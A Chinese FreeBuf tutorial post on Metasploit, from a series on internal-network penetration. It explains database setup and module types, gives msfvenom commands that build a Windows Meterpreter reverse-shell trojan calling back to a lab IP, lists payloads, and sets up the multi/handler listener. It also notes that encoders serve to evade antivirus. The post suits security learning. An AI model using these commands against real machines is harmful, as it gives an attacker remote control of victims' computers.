freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day3 -metasploit的使用

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网渗透 day3 -metasploit的使用
彩虹猛犸233 2020-11-16 12:41:53 321576

metasploit的使用

一、msf基本操作

1. 使用msfconsole进入msf控制台界面

2. 在控制台使用msfdb init初始化数据库(创建数据库),这边由于我之前操作过一次所以显示已经开启了,msfdb start开启数据库,然后在命令行模式下开启开机自启动数据库(systemctl enable postgresql) ,然后开启数据库服务(service postgresql start)

3. 查看数据库密码

cat /usr/share/metasploit-framework/config/database.yml


4. 数据库连接

db_connect msf:密码=@127.0.0.1/msf


二、msf模块(比较重要的四个)

渗透模块(exploit):这是一段程序,运行时会利用目标的安全漏洞进行攻击。

攻击载荷(payload):在成功对目标完成一次渗透之后,这段程序开始在目标计算机上运行。它能帮助我们在目标系统上获得需要的访问和行动权限。

辅助模块(auxiliary):包含了一系列的辅助支持模块,包括扫描模块、fuzz测试漏洞发掘模块、网络协议欺骗以及其他一些模块。

编码模块(encoder):编码器模块通常用来对攻击模块进行代码混淆,来逃过目标安全保护机制的检测。目标安全保护机制包括杀毒软件和防火墙等。

个人理解:用辅助模块查找发现漏洞,发现漏洞用渗透模块对漏洞进行攻击,成功渗透进去后将存放在传输器(stage)的攻击载荷通过传输体(stager)传输到目标机器上面,运行,获得权限;编码模块是用来对攻击载荷的木马进行封装逃避杀毒软件和防火墙。

三、木马生成

1. 使用msfvenom生成木马

wps6[4]

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f exe -o hello.exe

-p:payload 设置payload

-a:architecture(结构) 设置系统位数 x86 | x64     不写默认x86

--platform   设置平台 windows | linux

-e:encoder(编码) 设置编码

-i:iteration(迭代) 编码偏移次数

-f:format(格式) 文件格式

-o:output 输出文件

--list | -l 查看指令详细信息,如:msfvenom --list e

常用的payload

windows/x64/meterpreter/reverse_tcp

windows/x64/meterpreter/reverse_tcp_rc4

windows/x64/meterpreter/bind_tcp

windows/x64/meterpreter/bind_tcp_rc4

windows/x64/meterpreter/reverse_https

windows/x64/meterpreter/reverse_http


理解:因为采用的是反向连接所有这边木马要带上本机的操作地址和监听的端口号,这边假如有些-a的话,那windows/后面就需要跟上-a 带的数比如-a x64 就要windows/x64/meterpreter

四、开启监听模块(最常用的模块)

1. 配置监听模块

use exploit/multi/handler


2. 设置payload

set payload windows/meterpreter/reverse_tcp     这里需要跟木马的-p一样


3. 查看参数

show options                查看参数

LHOST ip   本机IP地址

LPORT 4444 本机端口


4. 设置参数信息LHOST(ip)和LPORT(端口)

set LHOST 192.168.227.129

set LPORT 4444


5. 开启监听

exploit或者run        开启监听


6. windows电脑双击exe文件,kali就可以是使用windows的cmd了

附录:我博客园的链接内网渗透 day3

# 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 彩虹猛犸233 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
内网渗透之Responder演练(下)
内网渗透之Responder演练(下)

网络安全

承接上文,本文主要介绍了以下几点:获取ntlmv1 hash并还原出ntlm hashNTLM hash中继攻击入门对抗responder:...

观安信息

478100围观  · 9收藏  · 17喜欢 2021-03-15

自主搭建的三层网络域渗透靶场打靶记录 原创
自主搭建的三层网络域渗透靶场打靶记录

网络安全

实验室的小伙伴最近搭建了一个域渗透的靶场,让我打一下,这样的机会我怎能推辞。

Anonymous_124

4193175围观  · 42收藏  · 346喜欢 2021-04-06

记一次Vulnstack靶场内网渗透(五) 原创
记一次Vulnstack靶场内网渗透(五)

网络安全

在本节中,我测试的靶场是vulnstack 5这个靶场。

Anonymous_124

382994围观  · 12收藏  · 49喜欢 2021-02-18

记一次Vulnstack靶场内网渗透(四) 原创
记一次Vulnstack靶场内网渗透(四)

网络安全

本次靶场渗透主要是Joomla CMS漏洞的综合渗透练习,通过信息收集、漏洞利用、权限提升、以及域渗透最终拿下域控并获得域控中的一份重要文件...

Anonymous_124

392829围观  · 5收藏  · 50喜欢 2021-02-04

域渗透之SPN服务主体名称
域渗透之SPN服务主体名称

Web安全

SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)的唯一标识符。

MS08067安全实验室

234014围观  · 1收藏  · 26喜欢 2021-02-03

彩虹猛犸233 LV.1
这家伙太懒了,还未填写个人描述!
  • 16 文章数
  • 46 关注者
empire3.6.0版本在执行persistencemiscdebugger*模块时报错解决
2020-11-19
内网渗透 day15-empire提权和后门植入
2020-11-18
内网渗透 day14-empire基础命令的使用
2020-11-17
文章目录
metasploit的使用
  • 一、msf基本操作
  • 二、msf模块(比较重要的四个)
  • 三、木马生成
  • 四、开启监听模块(最常用的模块)